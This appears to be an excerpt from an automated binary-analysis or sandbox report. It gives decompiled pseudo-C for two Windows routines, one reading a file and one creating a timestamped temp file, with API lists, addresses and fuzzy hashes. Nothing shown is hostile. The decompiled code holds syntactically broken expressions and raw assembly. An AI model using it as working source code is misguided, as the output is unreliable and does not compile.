                                                                                                                                                                  				signed short _v12;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				WCHAR* _t36;
                                                                                                                                                                  				signed short _t38;
                                                                                                                                                                  				void* _t41;
                                                                                                                                                                  				signed short _t45;
                                                                                                                                                                  				signed short _t49;
                                                                                                                                                                  				signed short _t50;
                                                                                                                                                                  				long _t60;
                                                                                                                                                                  				signed short _t61;
                                                                                                                                                                  				signed short _t65;
                                                                                                                                                                  				signed short _t68;
                                                                                                                                                                  				signed short _t73;
                                                                                                                                                                  				intOrPtr _t76;
                                                                                                                                                                  				void* _t77;
                                                                                                                                                                  				long _t78;
                                                                                                                                                                  				signed short _t82;
                                                                                                                                                                  				long _t83;
                                                                                                                                                                  				signed short _t85;
                                                                                                                                                                  				void* _t86;
                                                                                                                                                                  				signed short* _t87;
                                                                                                                                                                  				signed short _t88;
                                                                                                                                                                  				signed short _t91;
                                                                                                                                                                  				signed short _t96;
                                                                                                                                                                  				signed short _t97;
                                                                                                                                                                  
                                                                                                                                                                  				_t83 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				if(_a8 != 0) {
                                                                                                                                                                  					__eflags = _a4;
                                                                                                                                                                  					if(_a4 != 0) {
                                                                                                                                                                  						_t36 = _a12;
                                                                                                                                                                  						__eflags = _t36;
                                                                                                                                                                  						if(_t36 != 0) {
                                                                                                                                                                  							__eflags = 0 -  *_t36;
                                                                                                                                                                  							if(0 !=  *_t36) {
                                                                                                                                                                  								_t86 = CreateFileW(_t36, 0x80000000, 5, 0, 3, 0x8000080, 0);
                                                                                                                                                                  								_v8 = _t86;
                                                                                                                                                                  								__eflags = _t86 - 0xffffffff;
                                                                                                                                                                  								if(_t86 != 0xffffffff) {
                                                                                                                                                                  									L14:
                                                                                                                                                                  									_t38 =  &_v16;
                                                                                                                                                                  									__imp__GetFileSizeEx(_t86, _t38);
                                                                                                                                                                  									__eflags = _t38;
                                                                                                                                                                  									if(_t38 != 0) {
                                                                                                                                                                  										__eflags = _a16 - _t83;
                                                                                                                                                                  										if(_a16 == _t83) {
                                                                                                                                                                  											L25:
                                                                                                                                                                  											__eflags = _a28;
                                                                                                                                                                  											if(_a28 == 0) {
                                                                                                                                                                  												_t76 = _v16;
                                                                                                                                                                  												_t39 = _v12;
                                                                                                                                                                  												_t73 = _t76 - _t83;
                                                                                                                                                                  												_t77 = _t76 - _t83;
                                                                                                                                                                  												_push(0);
                                                                                                                                                                  												_pop(0);
                                                                                                                                                                  												asm("sbb eax, edi");
                                                                                                                                                                  												__eflags = 0 - _v12;
                                                                                                                                                                  												if(__eflags > 0) {
                                                                                                                                                                  													L27:
                                                                                                                                                                  													_t87 = _a4;
                                                                                                                                                                  													__eflags =  *_t87;
                                                                                                                                                                  													if( *_t87 == 0) {
                                                                                                                                                                  														__eflags = _t73;
                                                                                                                                                                  														if(_t73 == 0) {
                                                                                                                                                                  															L30:
                                                                                                                                                                  															_t88 = 0;
                                                                                                                                                                  															 *_a8 = 0;
                                                                                                                                                                  															L51:
                                                                                                                                                                  															_t41 = _v8;
                                                                                                                                                                  															__eflags = _t41 - 0xffffffff;
                                                                                                                                                                  															if(_t41 != 0xffffffff) {
                                                                                                                                                                  																CloseHandle(_t41);
                                                                                                                                                                  															}
                                                                                                                                                                  															L53:
                                                                                                                                                                  															goto L54;
                                                                                                                                                                  														}
                                                                                                                                                                  														_t85 = E00431078(_t73, 1);
                                                                                                                                                                  														__eflags = _t85;
                                                                                                                                                                  														if(_t85 != 0) {
                                                                                                                                                                  															L40:
                                                                                                                                                                  															_t78 = 0;
                                                                                                                                                                  															_t45 = 0;
                                                                                                                                                                  															_a24 = 0;
                                                                                                                                                                  															_a12 = 0;
                                                                                                                                                                  															while(1) {
                                                                                                                                                                  																_a16 = _t78;
                                                                                                                                                                  																_t88 = E0043657C(_t73, _t45,  &_a16);
                                                                                                                                                                  																__eflags = _t88;
                                                                                                                                                                  																if(_t88 < 0) {
                                                                                                                                                                  																	break;
                                                                                                                                                                  																}
                                                                                                                                                                  																_t49 = ReadFile(_v8, _a24 + _t85, _a16,  &_a12, 0);
                                                                                                                                                                  																__eflags = _t49;
                                                                                                                                                                  																if(_t49 == 0) {
                                                                                                                                                                  																	_t50 = GetLastError();
                                                                                                                                                                  																	__eflags = _t50;
                                                                                                                                                                  																	_t91 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  																	__eflags = _t91;
                                                                                                                                                                  																	_t88 =  >=  ? 0x80004005 : _t91;
                                                                                                                                                                  																	__eflags = _t88;
                                                                                                                                                                  																	E004300D9(0x80004005, "fileutil.cpp", 0x39f, _t88);
                                                                                                                                                                  																	break;
                                                                                                                                                                  																}
                                                                                                                                                                  																_t45 = _a24 + _a12;
                                                                                                                                                                  																__eflags = _a12;
                                                                                                                                                                  																_a24 = _t45;
                                                                                                                                                                  																if(_a12 != 0) {
                                                                                                                                                                  																	_t78 = 0;
                                                                                                                                                                  																	__eflags = 0;
                                                                                                                                                                  																	continue;
                                                                                                                                                                  																}
                                                                                                                                                                  																__eflags = _t45 - _t73;
                                                                                                                                                                  																if(_t45 == _t73) {
                                                                                                                                                                  																	 *_a4 = _t85;
                                                                                                                                                                  																	_t85 = 0;
                                                                                                                                                                  																	 *_a8 = _t73;
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	_t88 = 0x8000ffff;
                                                                                                                                                                  																}
                                                                                                                                                                  																break;
                                                                                                                                                                  															}
                                                                                                                                                                  															__eflags = _t85;
                                                                                                                                                                  															if(_t85 != 0) {
                                                                                                                                                                  																E00431137(_t85);
                                                                                                                                                                  															}
                                                                                                                                                                  															goto L51;
                                                                                                                                                                  														}
                                                                                                                                                                  														_t39 = 0x8007000e;
                                                                                                                                                                  														_push(0x8007000e);
                                                                                                                                                                  														_t88 = 0x8007000e;
                                                                                                                                                                  														_push(0x392);
                                                                                                                                                                  														L16:
                                                                                                                                                                  														_push("fileutil.cpp");
                                                                                                                                                                  														E004300D9(_t39);
                                                                                                                                                                  														goto L51;
                                                                                                                                                                  													}
                                                                                                                                                                  													__eflags = _t73;
                                                                                                                                                                  													if(_t73 != 0) {
                                                                                                                                                                  														_t85 = E0043120C( *_t87, _t73, 1);
                                                                                                                                                                  														__eflags = _t85;
                                                                                                                                                                  														if(_t85 != 0) {
                                                                                                                                                                  															goto L40;
                                                                                                                                                                  														}
                                                                                                                                                                  														_t39 = 0x8007000e;
                                                                                                                                                                  														_push(0x8007000e);
                                                                                                                                                                  														_t88 = 0x8007000e;
                                                                                                                                                                  														_push(0x385);
                                                                                                                                                                  														goto L16;
                                                                                                                                                                  													}
                                                                                                                                                                  													E00431137( *_t87);
                                                                                                                                                                  													 *_t87 = 0;
                                                                                                                                                                  													goto L30;
                                                                                                                                                                  												}
                                                                                                                                                                  												if(__eflags < 0) {
                                                                                                                                                                  													L34:
                                                                                                                                                                  													_t88 = 0x8007007a;
                                                                                                                                                                  													_push(0x8007007a);
                                                                                                                                                                  													_push(0x377);
                                                                                                                                                                  													goto L16;
                                                                                                                                                                  												}
                                                                                                                                                                  												__eflags = _a24 - _t77;
                                                                                                                                                                  												if(_a24 >= _t77) {
                                                                                                                                                                  													goto L27;
                                                                                                                                                                  												}
                                                                                                                                                                  												goto L34;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t73 = _a24;
                                                                                                                                                                  											__eflags = 0;
                                                                                                                                                                  											goto L27;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t83 = _a20;
                                                                                                                                                                  										__eflags = 0 - _v12;
                                                                                                                                                                  										if(__eflags < 0) {
                                                                                                                                                                  											L22:
                                                                                                                                                                  											_t60 = SetFilePointer(_t86, _t83, 0, 1);
                                                                                                                                                                  											__eflags = _t60 - 0xffffffff;
                                                                                                                                                                  											if(_t60 != 0xffffffff) {
                                                                                                                                                                  												goto L25;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t39 = GetLastError();
                                                                                                                                                                  											__eflags = _t39;
                                                                                                                                                                  											_t88 =  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											__eflags = _t88;
                                                                                                                                                                  											if(_t88 >= 0) {
                                                                                                                                                                  												goto L25;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push(_t88);
                                                                                                                                                                  											_push(0x365);
                                                                                                                                                                  											goto L16;
                                                                                                                                                                  										}
                                                                                                                                                                  										if(__eflags > 0) {
                                                                                                                                                                  											L21:
                                                                                                                                                                  											_t88 = 0x80070057;
                                                                                                                                                                  											goto L51;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags = _t83 - _v16;
                                                                                                                                                                  										if(_t83 <= _v16) {
                                                                                                                                                                  											goto L22;
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L21;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t61 = GetLastError();
                                                                                                                                                                  									__eflags = _t61;
                                                                                                                                                                  									_t96 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									_t39 = 0x80004005;
                                                                                                                                                                  									__eflags = _t96;
                                                                                                                                                                  									_t88 =  >=  ? 0x80004005 : _t96;
                                                                                                                                                                  									_push(_t88);
                                                                                                                                                                  									_push(0x357);
                                                                                                                                                                  									goto L16;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t82 = GetLastError();
                                                                                                                                                                  								__eflags = _t82;
                                                                                                                                                                  								_t65 =  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								_t88 = 0x80070002;
                                                                                                                                                                  								__eflags = _t65 - 0x80070002;
                                                                                                                                                                  								if(_t65 == 0x80070002) {
                                                                                                                                                                  									goto L53;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t82;
                                                                                                                                                                  								if(_t82 == 0) {
                                                                                                                                                                  									_t86 = _v8;
                                                                                                                                                                  									goto L14;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t97 = _t65;
                                                                                                                                                                  								__eflags = _t97;
                                                                                                                                                                  								_t88 =  >=  ? 0x80004005 : _t97;
                                                                                                                                                                  								E004300D9(0x80004005, "fileutil.cpp", 0x352, _t88);
                                                                                                                                                                  								goto L53;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t68 = 0x80070057;
                                                                                                                                                                  							_push(0x80070057);
                                                                                                                                                                  							_push(0x348);
                                                                                                                                                                  							goto L2;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t68 = 0x80070057;
                                                                                                                                                                  						_push(0x80070057);
                                                                                                                                                                  						_push(0x347);
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t68 = 0x80070057;
                                                                                                                                                                  						_push(0x80070057);
                                                                                                                                                                  						_push(0x346);
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L2;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t68 = 0x80070057;
                                                                                                                                                                  					_push(0x80070057);
                                                                                                                                                                  					_push(0x345);
                                                                                                                                                                  					L2:
                                                                                                                                                                  					_push("fileutil.cpp");
                                                                                                                                                                  					_t88 = _t68;
                                                                                                                                                                  					E004300D9(_t68);
                                                                                                                                                                  					L54:
                                                                                                                                                                  					return _t88;
                                                                                                                                                                  				}
                                                                                                                                                                  			}

                                                                                                                                                                  0x00436d0b
                                                                                                                                                                  0x00436d0e
                                                                                                                                                                  0x00436d10
                                                                                                                                                                  0x00436e27
                                                                                                                                                                  0x00436e27
                                                                                                                                                                  0x00436e2a
                                                                                                                                                                  0x00436e2d
                                                                                                                                                                  0x00436e30
                                                                                                                                                                  0x00436e30
                                                                                                                                                                  0x00436e36
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436e36
                                                                                                                                                                  0x00436d71
                                                                                                                                                                  0x00436d73
                                                                                                                                                                  0x00436d75
                                                                                                                                                                  0x00436d89
                                                                                                                                                                  0x00436d89
                                                                                                                                                                  0x00436d8b
                                                                                                                                                                  0x00436d8d
                                                                                                                                                                  0x00436d90
                                                                                                                                                                  0x00436d97
                                                                                                                                                                  0x00436d97
                                                                                                                                                                  0x00436da5
                                                                                                                                                                  0x00436da7
                                                                                                                                                                  0x00436da9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436dbd
                                                                                                                                                                  0x00436dc3
                                                                                                                                                                  0x00436dc5
                                                                                                                                                                  0x00436def
                                                                                                                                                                  0x00436dfe
                                                                                                                                                                  0x00436e00
                                                                                                                                                                  0x00436e08
                                                                                                                                                                  0x00436e0a
                                                                                                                                                                  0x00436e0a
                                                                                                                                                                  0x00436e18
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436e18
                                                                                                                                                                  0x00436dca
                                                                                                                                                                  0x00436dcd
                                                                                                                                                                  0x00436dd1
                                                                                                                                                                  0x00436dd4
                                                                                                                                                                  0x00436d95
                                                                                                                                                                  0x00436d95
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d95
                                                                                                                                                                  0x00436dd6
                                                                                                                                                                  0x00436dd8
                                                                                                                                                                  0x00436de4
                                                                                                                                                                  0x00436de9
                                                                                                                                                                  0x00436deb
                                                                                                                                                                  0x00436dda
                                                                                                                                                                  0x00436dda
                                                                                                                                                                  0x00436dda
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436dd8
                                                                                                                                                                  0x00436e1d
                                                                                                                                                                  0x00436e1f
                                                                                                                                                                  0x00436e22
                                                                                                                                                                  0x00436e22
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436e1f
                                                                                                                                                                  0x00436d77
                                                                                                                                                                  0x00436d7c
                                                                                                                                                                  0x00436d7d
                                                                                                                                                                  0x00436d7f
                                                                                                                                                                  0x00436c90
                                                                                                                                                                  0x00436c90
                                                                                                                                                                  0x00436c95
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436c95
                                                                                                                                                                  0x00436cfe
                                                                                                                                                                  0x00436d00
                                                                                                                                                                  0x00436d4d
                                                                                                                                                                  0x00436d4f
                                                                                                                                                                  0x00436d51
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d53
                                                                                                                                                                  0x00436d58
                                                                                                                                                                  0x00436d59
                                                                                                                                                                  0x00436d5b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d5b
                                                                                                                                                                  0x00436d04
                                                                                                                                                                  0x00436d09
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d09
                                                                                                                                                                  0x00436d2c
                                                                                                                                                                  0x00436d33
                                                                                                                                                                  0x00436d33
                                                                                                                                                                  0x00436d38
                                                                                                                                                                  0x00436d39
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d39
                                                                                                                                                                  0x00436d2e
                                                                                                                                                                  0x00436d31
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d31
                                                                                                                                                                  0x00436cf1
                                                                                                                                                                  0x00436cf4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436cf4
                                                                                                                                                                  0x00436ca4
                                                                                                                                                                  0x00436ca9
                                                                                                                                                                  0x00436cac
                                                                                                                                                                  0x00436cbf
                                                                                                                                                                  0x00436cc4
                                                                                                                                                                  0x00436cca
                                                                                                                                                                  0x00436ccd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436ccf
                                                                                                                                                                  0x00436cda
                                                                                                                                                                  0x00436cdc
                                                                                                                                                                  0x00436cdf
                                                                                                                                                                  0x00436ce1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436ce3
                                                                                                                                                                  0x00436ce4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436ce4
                                                                                                                                                                  0x00436cae
                                                                                                                                                                  0x00436cb5
                                                                                                                                                                  0x00436cb5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436cb5
                                                                                                                                                                  0x00436cb0
                                                                                                                                                                  0x00436cb3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436cb3
                                                                                                                                                                  0x00436c70
                                                                                                                                                                  0x00436c7b
                                                                                                                                                                  0x00436c7d
                                                                                                                                                                  0x00436c80
                                                                                                                                                                  0x00436c85
                                                                                                                                                                  0x00436c87
                                                                                                                                                                  0x00436c8a
                                                                                                                                                                  0x00436c8b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436c8b
                                                                                                                                                                  0x00436c1d
                                                                                                                                                                  0x00436c27
                                                                                                                                                                  0x00436c29
                                                                                                                                                                  0x00436c2c
                                                                                                                                                                  0x00436c31
                                                                                                                                                                  0x00436c33
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436c39
                                                                                                                                                                  0x00436c3b
                                                                                                                                                                  0x00436c5e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436c5e
                                                                                                                                                                  0x00436c3d

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,000000F8,00000000,00000000,?,00000000,?,?), ref: 00436C05
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00436C1B
                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00436C66
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00436C70
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00436E30
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 3555958901-2967768451
                                                                                                                                                                  • Opcode ID: 9449c61ab784c35bbdeda08b47bf116130828b945e1fece7cf01655c0f7bcb39
                                                                                                                                                                  • Instruction ID: eea59d09bc76e9811a59d702b1a09118f995223fbb5b3c1e81295b2dab5685d5
                                                                                                                                                                  • Opcode Fuzzy Hash: 9449c61ab784c35bbdeda08b47bf116130828b945e1fece7cf01655c0f7bcb39
                                                                                                                                                                  • Instruction Fuzzy Hash: E3710631A00212BBDB218E298C45B6F76E8EB48750F12A12BFD55EB290D67CDD008A9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E0043167E(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, void** _a24) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				short _v528;
                                                                                                                                                                  				struct _SYSTEMTIME _v544;
                                                                                                                                                                  				char _v548;
                                                                                                                                                                  				WCHAR* _v552;
                                                                                                                                                                  				char _v556;
                                                                                                                                                                  				signed int _v560;
                                                                                                                                                                  				intOrPtr _v564;
                                                                                                                                                                  				intOrPtr _v568;
                                                                                                                                                                  				void** _v572;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t49;
                                                                                                                                                                  				signed short _t60;
                                                                                                                                                                  				void* _t63;
                                                                                                                                                                  				void* _t82;
                                                                                                                                                                  				void** _t87;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				signed short _t89;
                                                                                                                                                                  				void* _t90;
                                                                                                                                                                  				signed short _t91;
                                                                                                                                                                  				intOrPtr _t95;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  				signed int _t103;
                                                                                                                                                                  				void* _t108;
                                                                                                                                                                  				intOrPtr* _t109;
                                                                                                                                                                  				signed short _t116;
                                                                                                                                                                  				signed int _t117;
                                                                                                                                                                  				void* _t118;
                                                                                                                                                                  				void* _t119;
                                                                                                                                                                  
                                                                                                                                                                  				_t98 = __ecx;
                                                                                                                                                                  				_t49 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t49 ^ _t117;
                                                                                                                                                                  				_v560 = _a12;
                                                                                                                                                                  				_t95 = _a8;
                                                                                                                                                                  				_t109 = _a4;
                                                                                                                                                                  				_v564 = _a16;
                                                                                                                                                                  				_v568 = _a20;
                                                                                                                                                                  				_push(0x208);
                                                                                                                                                                  				_v572 = _a24;
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v528);
                                                                                                                                                                  				E004267C0(_t95, __ecx, 0, _t109, __eflags);
                                                                                                                                                                  				_v548 = 0;
                                                                                                                                                                  				_v556 = 0;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t119 = _t118 + 0xc;
                                                                                                                                                                  				_t108 =  &_v544 | 0xffffffff;
                                                                                                                                                                  				_v552 = 0;
                                                                                                                                                                  				if(_t109 == 0 ||  *_t109 == 0) {
                                                                                                                                                                  					_t60 = GetTempPathW(0x104,  &_v528);
                                                                                                                                                                  					__eflags = _t60;
                                                                                                                                                                  					if(_t60 != 0) {
                                                                                                                                                                  						_push( &_v548);
                                                                                                                                                                  						_push(_t95);
                                                                                                                                                                  						_push( &_v528);
                                                                                                                                                                  						goto L6;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t91 = GetLastError();
                                                                                                                                                                  					__eflags = _t91;
                                                                                                                                                                  					_t116 =  <=  ? _t91 : _t91 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					__eflags = _t116;
                                                                                                                                                                  					_t110 =  >=  ? 0x80004005 : _t116;
                                                                                                                                                                  					E004300D9(0x80004005, "pathutil.cpp", 0x26d,  >=  ? 0x80004005 : _t116);
                                                                                                                                                                  					goto L24;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push( &_v548);
                                                                                                                                                                  					_push(_t95);
                                                                                                                                                                  					_push(_t109);
                                                                                                                                                                  					L6:
                                                                                                                                                                  					_t63 = E004314A9();
                                                                                                                                                                  					_t110 = _t63;
                                                                                                                                                                  					if(_t63 < 0) {
                                                                                                                                                                  						L24:
                                                                                                                                                                  						if(_v552 != 0) {
                                                                                                                                                                  							E004380AB(_v552);
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_v556 != 0) {
                                                                                                                                                                  							E004380AB(_v556);
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_v548 != 0) {
                                                                                                                                                                  							E004380AB(_v548);
                                                                                                                                                                  						}
                                                                                                                                                                  						return L004267AF(_t110, _v8 ^ _t117, _t108, _t110);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(E00431C88(_t98, _v548,  &_v556) != 0) {
                                                                                                                                                                  						L9:
                                                                                                                                                                  						_t97 =  !=  ? _v560 : 0x43b580;
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							_v560 = _v560 & 0x00000000;
                                                                                                                                                                  							GetLocalTime( &_v544);
                                                                                                                                                                  							_push(_v564);
                                                                                                                                                                  							_push(0x2e);
                                                                                                                                                                  							_t74 =  !=  ? 0x452c20 : 0x43b580;
                                                                                                                                                                  							_push( !=  ? 0x452c20 : 0x43b580);
                                                                                                                                                                  							_push(_t97);
                                                                                                                                                                  							_push(_v544.wSecond & 0x0000ffff);
                                                                                                                                                                  							_push(_v544.wMinute & 0x0000ffff);
                                                                                                                                                                  							_push(_v544.wHour & 0x0000ffff);
                                                                                                                                                                  							_push(_v544.wDay & 0x0000ffff);
                                                                                                                                                                  							_push(_v544.wMonth & 0x0000ffff);
                                                                                                                                                                  							_push(_v544.wYear & 0x0000ffff);
                                                                                                                                                                  							_t82 = E00433CEA( &_v552, L"%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls", _v548);
                                                                                                                                                                  							_t110 = _t82;
                                                                                                                                                                  							_t119 = _t119 + 0x30;
                                                                                                                                                                  							if(_t82 < 0) {
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t108 = CreateFileW(_v552, 0x40000000, 1, 0, 1, 0x80, 0);
                                                                                                                                                                  							if(_t108 != 0xffffffff) {
                                                                                                                                                                  								L18:
                                                                                                                                                                  								_t86 = _v568;
                                                                                                                                                                  								if(_v568 == 0) {
                                                                                                                                                                  									L20:
                                                                                                                                                                  									_t87 = _v572;
                                                                                                                                                                  									if(_t87 != 0) {
                                                                                                                                                                  										 *_t87 = _t108;
                                                                                                                                                                  										_t108 = _t108 | 0xffffffff;
                                                                                                                                                                  									}
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t88 = E00433F88(_t86, _v552, 0);
                                                                                                                                                                  								_t110 = _t88;
                                                                                                                                                                  								if(_t88 < 0) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L20;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t89 = GetLastError();
                                                                                                                                                                  							if(_t89 == 0x50 || _t89 == 5) {
                                                                                                                                                                  								Sleep(0x64);
                                                                                                                                                                  								_t89 = 0;
                                                                                                                                                                  								_t103 = 1;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t103 = _v560;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t110 =  <=  ? _t89 : _t89 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							if(( <=  ? _t89 : _t89 & 0x0000ffff | 0x80070000) < 0) {
                                                                                                                                                                  								goto L24;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								if(_t103 != 0) {
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L18;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_t108 != 0xffffffff) {
                                                                                                                                                                  							CloseHandle(_t108);
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L24;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t90 = E00437850(_v556, _t70);
                                                                                                                                                                  					_t110 = _t90;
                                                                                                                                                                  					if(_t90 < 0) {
                                                                                                                                                                  						goto L24;
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				}
                                                                                                                                                                  			}



































                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000001,00000000,00000009), ref: 00431718
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00431722
                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 004317BD
                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 0043184B
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00431858
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0043186A
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004318CA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                                  • String ID: ,E$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                                  • API String ID: 3480017824-3983667056
                                                                                                                                                                  • Opcode ID: ab917cedbdd24ff18d86546282577be4c56a3b33bc174a13acbeb6f70cbc116a
                                                                                                                                                                  • Instruction ID: c002f17cd6b9caa630ec2a389d5f59f0597f3cedcc4fe586e16a870ed1bc83b1
                                                                                                                                                                  • Opcode Fuzzy Hash: ab917cedbdd24ff18d86546282577be4c56a3b33bc174a13acbeb6f70cbc116a
                                                                                                                                                                  • Instruction Fuzzy Hash: CE616A71901229ABDB249BA5DC48BAFB7F8EF0C711F1011A6F905E71A0D7789D84CF58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
